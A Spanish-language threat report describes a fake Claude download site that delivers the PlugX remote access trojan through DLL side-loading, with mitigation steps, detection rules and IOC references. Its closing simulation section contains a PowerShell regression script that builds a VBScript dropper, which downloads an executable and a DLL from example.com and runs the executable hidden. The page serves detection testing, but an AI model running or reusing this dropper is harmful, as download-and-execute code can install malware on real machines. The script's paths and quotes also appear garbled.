El sitio falso de Claude instala malware que da a los atacantes acceso a tu computadora
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los atacantes configuraron una página de descarga falsa de Claude que entregó un archivo ZIP troyanizado a usuarios desprevenidos. Una vez abierto, el archivo instaló un cliente de escritorio Claude aparentemente legítimo mientras desplegaba encubiertamente el troyano de acceso remoto PlugX a través de la carga lateral de DLL con un actualizador firmado de G DATA. La carga maliciosa se colocó en la carpeta de Inicio del usuario para mantener la persistencia y luego inició la comunicación HTTPS saliente con un servidor de mando y control. La campaña muestra cómo los actores de amenazas están explotando cada vez más el interés en herramientas de IA populares como señuelo de ingeniería social para un compromiso inicial.
Investigación
Durante el análisis, los investigadores descomprimieron el archivo ZIP, identificaron la ruta de instalación del MSI y siguieron la ejecución hasta un dropper de VBScript que escribió NOVUpdate.exe, un avk.dllmalicioso, y un archivo de datos encriptados en la carpeta de Inicio. La ejecución en sandbox confirmó que el binario cargado lateralmente se lanzó con éxito, alteró una clave de registro relacionada con TCP/IP, e inició conexiones salientes a través del puerto 443 a una dirección IP alojada en Alibaba Cloud. Estos hallazgos confirmaron la entrega de PlugX a través de una cadena de infección por etapas disfrazada de software legítimo de IA.
Mitigación
Los usuarios deben descargar el software de Claude solo de fuentes oficiales verificadas y validar la autenticidad de los paquetes de instalación antes de la ejecución. Los defensores deben inspeccionar las carpetas de Inicio en busca de binarios o DLLs inesperados, especialmente archivos que imiten componentes de actualización legítimos. También se debe revisar la telemetría del firewall y del endpoint en busca de tráfico HTTPS saliente sospechoso relacionado con aplicaciones recién instaladas. Eliminar los archivos maliciosos, revertir cualquier cambio no autorizado en el registro y ejecutar un escaneo anti-malware confiable son pasos clave para contener la amenaza.
Respuesta
Los equipos de seguridad deben detectar y alertar sobre la presencia de NOVUpdate.exe, avk.dll, o NOVUpdate.exe.dat dentro del directorio de Inicio. Las detecciones adicionales deben centrarse en binarios de actualizadores de G DATA firmados que carguen DLLs no confiables y establezcan sesiones TLS salientes inesperadas hacia la infraestructura identificada. Los hosts afectados deben someterse a una completa remediación y revisión forense para confirmar que no queden otros componentes de PlugX, mecanismos de persistencia, o cargas útiles posteriores activas.
Flujo de Ataque
Detecciones
LOLBAS WScript / CScript (vía creación_proceso)
Ver
Uso Posible de Timeout para Retrasar Ejecución (vía cmdline)
Ver
Binarios / Scripts Sospechosos en Ubicación de Autoinicio (vía evento_archivo)
Ver
IOCs (HashSha256) para detectar: El sitio falso de Claude instala malware que da acceso a los atacantes a tu computadora
Ver
IOCs (SourceIP) para detectar: El sitio falso de Claude instala malware que da acceso a los atacantes a tu computadora
Ver
IOCs (DestinationIP) para detectar: El sitio falso de Claude instala malware que da acceso a los atacantes a tu computadora
Ver
Detectar Drops y Ejecución de NOVUpdate.exe por WScript [Creación de Procesos en Windows]
Ver
Detección de Instalador troyanizado del Sitio falso de Claude [Evento de Archivo en Windows]
Ver
Ejecución de Simulación
Prerequisito: El chequeo Prevuelo de Telemetría & Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos:
Un atacante elabora un script VBS malicioso que descarga la carga útilNOVUpdate.exedesde un servidor de mando y control (C2), lo escribe en%TEMP%, y luego lo lanza a través dewscript.exe. El mismo script también cargaavk.dlldesde la misma ubicación para lograr la carga lateral de DLL. El atacante se apoya en el Windows Script Host (WSH) incorporado para evitar levantar sospechas de las heurísticas tradicionales de AV.- Escribe el archivo VBS malicioso (
malicious.vbs) a%TEMP%. - Invocar
wscript.execon la ruta al archivo VBS. - El script VBS realiza un GET HTTP para obtener
NOVUpdate.exeandavk.dll, los escribe en el disco y ejecutaNOVUpdate.exe.
- Escribe el archivo VBS malicioso (
-
Script de Prueba de Regresión:
# -------------------------------------------------------------------- # Simulación de dropper malicioso – activa la regla Sigma # -------------------------------------------------------------------- $tempDir = "$env:TEMPDropperDemo" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null # 1. Crear un VBS malicioso que descargue dos archivos y ejecute NOVUpdate.exe $vbsPath = "$tempDirmalicious.vbs" $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.open "GET", "http://example.com/NOVUpdate.exe", False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$tempDirNOVUpdate.exe", 2 objStream.Close End If
‘ Descargar avk.dll (usado para carga lateral de DLL) objXML.open «GET», «http://example.com/avk.dll«, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(«ADODB.Stream») objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile «$tempDiravk.dll», 2 objStream.Close End If
‘ Ejecutar el EXE descargado CreateObject(«WScript.Shell»).Run «»»$tempDirNOVUpdate.exe»»», 0, False «@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Ejecutar el script vía wscript.exe (esta es la telemetría que estamos probando)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden
# OPCIONAL: pausa para permitir que se dispare la detección
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
-
Comandos de Limpieza:
# Eliminar todos los artefactos creados por la simulación $tempDir = "$env:TEMPDropperDemo" if (Test-Path $tempDir) { Remove-Item -Path $tempDir -Recurse -Force } # Asegúrate de que cualquier proceso NOVUpdate.exe restante sea terminado Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force